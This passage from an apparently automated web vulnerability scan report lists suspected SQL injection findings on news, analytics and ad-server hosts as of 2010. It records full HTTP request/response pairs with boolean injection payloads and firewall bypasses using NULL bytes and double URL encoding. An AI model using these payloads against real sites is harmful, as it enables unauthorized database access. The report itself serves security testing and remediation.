<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.111. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/203708.xml [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/203708.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /mngi/rss/CustomRssServlet/568%00'/203708.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 34
Date: Tue, 07 Dec 2010 23:19:28 GMT
Connection: close

<h1>Bad Request (Invalid URL)</h1>

Request 2

GET /mngi/rss/CustomRssServlet/568%00''/203708.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:19:28 GMT
Content-Length: 0
Connection: close


1.112. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/210701.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/210701.xml

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 15372256'%20or%201%3d1--%20 and 15372256'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet15372256'%20or%201%3d1--%20/568/210701.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:21:03 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss/CustomRssServlet15372256'%20or%201%3d2--%20/568/210701.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:21:04 GMT
Content-Length: 0
Connection: close


1.113. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/214511.xml [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/214511.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/568'%20and%201%3d1--%20/214511.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:22:50 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss/CustomRssServlet/568'%20and%201%3d2--%20/214511.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:22:50 GMT
Content-Length: 0
Connection: close


1.114. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/214511.xml [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/214511.xml

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /mngi/rss/CustomRssServlet/568/214511.xml%00' HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 34
Expires: Tue, 07 Dec 2010 23:22:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 07 Dec 2010 23:22:52 GMT
Connection: close

<h1>Bad Request (Invalid URL)</h1>

Request 2

GET /mngi/rss/CustomRssServlet/568/214511.xml%00'' HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/xml;charset=utf-8
Expires: Tue, 07 Dec 2010 23:22:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 07 Dec 2010 23:22:52 GMT
Content-Length: 591
Connection: close
Set-Cookie: JSESSIONID=YLI2POOCBMFEWCUUBC5CFGQ; path=/

<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:atom="http://www.w3.org/2005/Atom"
version="2.0">
<channel>
<atom:link href="http://fee
...[SNIP]...

1.115. http://metrics.carpricesecrets.com/b/ss/cvencarpricesecrets/1/H.16/s75690248599275 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://metrics.carpricesecrets.com
Path:   /b/ss/cvencarpricesecrets/1/H.16/s75690248599275

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss/cvencarpricesecrets%00'/1/H.16/s75690248599275?[AQB]&ndh=1&t=7/11/2010%2016%3A55%3A22%202%20360&vmt=48DA665D&ns=classifiedventures1&pageName=DLP%20-%20Make&g=http%3A//www.carpricesecrets.com/mercury%3Ft_se%3Dmsn%26t_campid%3D1295942%26t_adgpid%3D147006720%26t_adid%3D262573534%26t_keyid%3D1323580327%26t_mtype%3Dc&r=http%3A//cm.npc-medianews.overture.com/js_1_0/%3Fconfig%3D2554942840%26type%3Dmisc%26ctxtId%3Dmisc%26keywordCharEnc%3Dutf8%26source%3Dnpc_mng_sanjosemercurynews_t2_ctxt%26adwd%3D728%26adht%3D90%26ctxtUrl%3Dhttp%253A%252F%252Fwww.mercurynews.com%252F%26du%3D1%26cb%3D1291762313102%26ctxtContent%3D%253Chead%253E%253C&cc=USD&ch=/mercury&server=www.carpricesecrets.com&events=event8%2Cevent2&c1=1&v1=1&c3=2%3A30PM&c4=Tuesday&c5=Weekday&c6=New&c7=28&v7=Step1%3A%20Quote-Make%20Landing%20Page&c8=999&v11=2%3A30PM&v12=Tuesday&v13=Weekday&v14=New&v32=Paid&v35=MSN&v40=MSN&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1419&bh=892&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.210.7%3BJava%28TM%29%20Platform%20SE%206%20U21%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: metrics.carpricesecrets.com
Proxy-Connection: keep-alive
Referer: http://www.carpricesecrets.com/mercury?t_se=msn&t_campid=1295942&t_adgpid=147006720&t_adid=262573534&t_keyid=1323580327&t_mtype=c
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op387homepage1gum=a02f08301726c7j09t6e489c1; op387homepage1liid=a02f08301726c7j09t6e489c1; s_cc=true; s_nr=1291762522620

Response 1

HTTP/1.1 404 Not Found
Date: Wed, 08 Dec 2010 00:49:33 GMT
Server: Omniture DC/2.0.0
Content-Length: 429
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/cvencarpricesecrets was not found on this serve
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/cvencarpricesecrets%00''/1/H.16/s75690248599275?[AQB]&ndh=1&t=7/11/2010%2016%3A55%3A22%202%20360&vmt=48DA665D&ns=classifiedventures1&pageName=DLP%20-%20Make&g=http%3A//www.carpricesecrets.com/mercury%3Ft_se%3Dmsn%26t_campid%3D1295942%26t_adgpid%3D147006720%26t_adid%3D262573534%26t_keyid%3D1323580327%26t_mtype%3Dc&r=http%3A//cm.npc-medianews.overture.com/js_1_0/%3Fconfig%3D2554942840%26type%3Dmisc%26ctxtId%3Dmisc%26keywordCharEnc%3Dutf8%26source%3Dnpc_mng_sanjosemercurynews_t2_ctxt%26adwd%3D728%26adht%3D90%26ctxtUrl%3Dhttp%253A%252F%252Fwww.mercurynews.com%252F%26du%3D1%26cb%3D1291762313102%26ctxtContent%3D%253Chead%253E%253C&cc=USD&ch=/mercury&server=www.carpricesecrets.com&events=event8%2Cevent2&c1=1&v1=1&c3=2%3A30PM&c4=Tuesday&c5=Weekday&c6=New&c7=28&v7=Step1%3A%20Quote-Make%20Landing%20Page&c8=999&v11=2%3A30PM&v12=Tuesday&v13=Weekday&v14=New&v32=Paid&v35=MSN&v40=MSN&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1419&bh=892&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.210.7%3BJava%28TM%29%20Platform%20SE%206%20U21%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: metrics.carpricesecrets.com
Proxy-Connection: keep-alive
Referer: http://www.carpricesecrets.com/mercury?t_se=msn&t_campid=1295942&t_adgpid=147006720&t_adid=262573534&t_keyid=1323580327&t_mtype=c
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op387homepage1gum=a02f08301726c7j09t6e489c1; op387homepage1liid=a02f08301726c7j09t6e489c1; s_cc=true; s_nr=1291762522620

Response 2

HTTP/1.1 404 Not Found
Date: Wed, 08 Dec 2010 00:49:33 GMT
Server: Omniture DC/2.0.0
xserver: www608
Content-Length: 0
Content-Type: text/html


1.116. http://metrics.carpricesecrets.com/b/ss/cvennewscars/1/H.14/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://metrics.carpricesecrets.com
Path:   /b/ss/cvennewscars/1/H.14/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /b%2527/ss/cvennewscars/1/H.14/?ns=classifiedventures1&events=event5 HTTP/1.1
Host: metrics.carpricesecrets.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: op387homepage1liid=a02f08301726c7j09t6e489c1; s_cc=true; __utmz=131857437.1291762524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|267F5DCB051580AB-40000170603794A2[CE]; s_nr=1291762522620; __utma=131857437.1334277704.1291762524.1291762524.1291762524.1; __utmc=131857437; __utmb=131857437.1.10.1291762524; op387homepage1gum=a02f08301726c7j09t6e489c1;

Response 1

HTTP/1.1 404 Not Found
Date: Wed, 08 Dec 2010 01:06:06 GMT
Server: Omniture DC/2.0.0
Content-Length: 433
Content-Type: text/html; charset=iso-8859-1
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b%27/ss/cvennewscars/1/H.14/ was not found on this s
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b%2527%2527/ss/cvennewscars/1/H.14/?ns=classifiedventures1&events=event5 HTTP/1.1
Host: metrics.carpricesecrets.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: op387homepage1liid=a02f08301726c7j09t6e489c1; s_cc=true; __utmz=131857437.1291762524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|267F5DCB051580AB-40000170603794A2[CE]; s_nr=1291762522620; __utma=131857437.1334277704.1291762524.1291762524.1291762524.1; __utmc=131857437; __utmb=131857437.1.10.1291762524; op387homepage1gum=a02f08301726c7j09t6e489c1;

Response 2

HTTP/1.1 404 Not Found
Date: Wed, 08 Dec 2010 01:06:06 GMT
Server: Omniture DC/2.0.0
xserver: www609
Content-Length: 0
Content-Type: text/html
Connection: close


1.117. http://metrics.carpricesecrets.com/b/ss/cvennewscars/1/H.14/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://metrics.carpricesecrets.com
Path:   /b/ss/cvennewscars/1/H.14/

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss/cvennewscars%00'/1/H.14/?ns=classifiedventures1&events=event5 HTTP/1.1
Host: metrics.carpricesecrets.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: op387homepage1liid=a02f08301726c7j09t6e489c1; s_cc=true; __utmz=131857437.1291762524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|267F5DCB051580AB-40000170603794A2[CE]; s_nr=1291762522620; __utma=131857437.1334277704.1291762524.1291762524.1291762524.1; __utmc=131857437; __utmb=131857437.1.10.1291762524; op387homepage1gum=a02f08301726c7j09t6e489c1;

Response 1

HTTP/1.1 404 Not Found
Date: Wed, 08 Dec 2010 01:06:09 GMT
Server: Omniture DC/2.0.0
Content-Length: 422
Content-Type: text/html; charset=iso-8859-1
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/cvennewscars was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/cvennewscars%00''/1/H.14/?ns=classifiedventures1&events=event5 HTTP/1.1
Host: metrics.carpricesecrets.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: op387homepage1liid=a02f08301726c7j09t6e489c1; s_cc=true; __utmz=131857437.1291762524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|267F5DCB051580AB-40000170603794A2[CE]; s_nr=1291762522620; __utma=131857437.1334277704.1291762524.1291762524.1291762524.1; __utmc=131857437; __utmb=131857437.1.10.1291762524; op387homepage1gum=a02f08301726c7j09t6e489c1;

Response 2

HTTP/1.1 404 Not Found
Date: Wed, 08 Dec 2010 01:06:09 GMT
Server: Omniture DC/2.0.0
xserver: www614
Content-Length: 0
Content-Type: text/html
Connection: close


1.118. http://open.ad.yieldmanager.net/a1 [conTy2 parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://open.ad.yieldmanager.net
Path:   /a1

Issue detail

The conTy2 parameter appears to be vulnerable to SQL injection attacks. The payloads 13898589'%20or%201%3d1--%20 and 13898589'%20or%201%3d2--%20 were each submitted in the conTy2 parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /a1?V=4&pubId=22651123575&site=www.mercurynews.com&cntTy=js&cTopId=20201001&cDst=_blank&cSctn=section&enc=utf-8&ctLng=en-US&tagTy=multi_secure&nAdP=10&rFrame=1&flv=10.1%20r103&cb=1291762308280&url=http%3A%2F%2Fwww.mercurynews.com%2F&fmt0=Standard%20Graphical,Rich%20Media&sz0=130x70&dlv0=ipbtf_tlsb&conTy0=fn_news&rTg0=Home&cCat0=homefront&sltId0=0&fmt1=Standard%20Graphical,Rich%20Media&sz1=130x70&dlv1=ipbtf_mlsb&conTy1=fn_news&rTg1=Home&cCat1=homefront&sltId1=1&fmt2=Standard%20Graphical,Rich%20Media&sz2=130x70&dlv2=ipbtf_blsb&conTy2=fn_news13898589'%20or%201%3d1--%20&rTg2=Home&cCat2=homefront&sltId2=2&fmt3=Standard%20Graphical,Rich%20Media&sz3=728x90&dlv3=ipbtf&conTy3=fn_news&rTg3=Home&cCat3=homefront&sltId3=3&fmt4=Standard%20Graphical,Rich%20Media&sz4=234x60&dlv4=ipatf&conTy4=fn_news&rTg4=Home&cCat4=homefront&sltId4=4&fmt5=Standard%20Graphical,Rich%20Media&sz5=130x70&dlv5=ipbtf_trsb&conTy5=fn_news&rTg5=Home&cCat5=homefront&sltId5=5&fmt6=Standard%20Graphical,Rich%20Media&sz6=130x70&dlv6=ipbtf_mrsb&conTy6=fn_news&rTg6=Home&cCat6=homefront&sltId6=6&fmt7=Standard%20Graphical,Rich%20Media&sz7=130x70&dlv7=ipbtf_brsb&conTy7=fn_news&rTg7=Home&cCat7=homefront&sltId7=7&fmt8=Standard%20Graphical,Rich%20Media&sz8=972x30&dlv8=ipstf&conTy8=fn_news&rTg8=Home&cCat8=homefront&sltId8=8&fmt9=Standard%20Graphical,Rich%20Media&sz9=300x250&dlv9=ipatf&conTy9=fn_news&rTg9=Home&cCat9=homefront&sltId9=9&byt=%3Chead%3E%3Cmeta%20name%3D%22description%22%20content%3D%22San%20Jose%20Mercury%20News%20-%20breaking%20news%2C%20weather%2C%20traffic%2C%20shopping%2C%20sports%2C%20jobs%2C%20cars%2C%20homes%20and%20local%20events%22%3E%3Cmeta%20name%3D%22keywords%22%20content%3D%22San%20Jose%20Mercury%20News%20Silicon%20Valley%22%3E%3Ctitle%3EHome%20-%20San%20Jose%20Mercury%20News%3C%2Ftitle%3E%3Cscript%20language%3D%22JavaScript%22%3E%0Adocument.write('%3Clink%20rel%3D%22shortcut%20icon%22%20href%3D%22http%3A%2F%2Fextras.mnginteractive.com%2Flive%2Fmedia%2FfavIcon%2Fmercury%2Ffavicon.ico%22%20type
%3D%22image%2Fx-icon%22%3E')%3B%0Adocument.write('%3Clink%20rel%3D%22icon%22%20href%3D%22http%3A%2F%2Fextras.mnginter HTTP/1.1
Host: open.ad.yieldmanager.net
Proxy-Connection: keep-alive
Referer: http://www.mercurynews.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: XO=y=1&t=336&v=3&yoo=1&XTS=1291409476&XSIG=pecndMzRAfdBMSLsOkyk3Ddt.Ss-; BX=4qhoo656b19gs&b=4&s=fq&t=336

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 00:23:26 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: S=s=cah6oal6ftjvu&t=1291767806;path=/; expires=
Cache-Control: no-cache, private
Pragma: no-cache
Expires: 0
Connection: close
Content-Type: application/x-multiad-json; charset=UTF-8
Content-Length: 19343


(function(){

var multiAdPack = {
"encoding":"UTF-8",
"version":"1.1",
"reqtype":"ac",
"ads":[
{"ad":"<a href=\"http://us.ard.yahoo.com/SIG=163iq7aak/M=601052417.601382328.486678551.475726551/D=nchome/S=2022775704:AP15/Y=PARTNER_US/L=5fe8d8d0-0261-11e0-9680-5f66a70d32a8/B=nyM1A0S0q9w-/J=1291767806597134/K=7yw44sfu15oFXuUWnv7nKQ/EXP=1291775006/A=2090268460610887709/R=0/X=2/SIG=10oj4p42h/*http://www.bay101.com/\" target=\"_blank\"><img src=\"http://ads.yldmgrimg.net/apex/mediastore/6fe1f6a7-354c-48b3-b72a-d8d7905e6c69\" alt=\"\" width=130 height=70 border=0/></a><img style=\"display:none\" width=0 height=0 alt=\"\" src=\"http://us.bc.yahoo.com/b?P=5fe8d8d0-0261-11e0-9680-5f66a70d32a8&T=19een5mpp%2fX%3d1291767806%2fE%3d2022775704%2fR%3dnchome%2fK%3d5%2fV%3d8.1%2fW%3d0%2fY%3dPARTNER_US%2fF%3d1035653421%2fH%3dYWx0c3BpZD0iOTY3MjgzMDAzIiBzZXJ2ZUlkPSI1ZmU4ZDhkMC0wMjYxLTExZTAtOTY4MC01ZjY2YTcwZDMyYTgiIHNpdGVJZD0iMjExMDUxIiB0U3RtcD0iMTI5MTc2NzgwNjUyODg1NyIgdGFyZ2V0PSJfYmxhbmsiIA--%2fQ%3d-1%2fS%3d1%2fJ%3d29ABB444&U=13ui8q641%2fN%3dnyM1A0S0q9w-%2fC%3d601052417.601382328.486678551.475726551%2fD%3dAP15%2fB%3d2090268460610887709%2fV%3d2\"><!-- fac-gd2-noad --><!--rTg has invalid value--><!--rTg has invalid value--><!--MME|5fe8d8d0-0261-11e0-9680-5f66a70d32a8--><!--TRK:a:2090268460610887709,m:601052417.601382328.486678551.475726551--><!--fac16.ads.adx.sk1.yahoo.com--><!--QYZ ,;130x70;ipbtf_tlsb;-->",
"type":"text/html",
"id":"0",
"size":["130x70"],
"slug":false,
"secure":false},
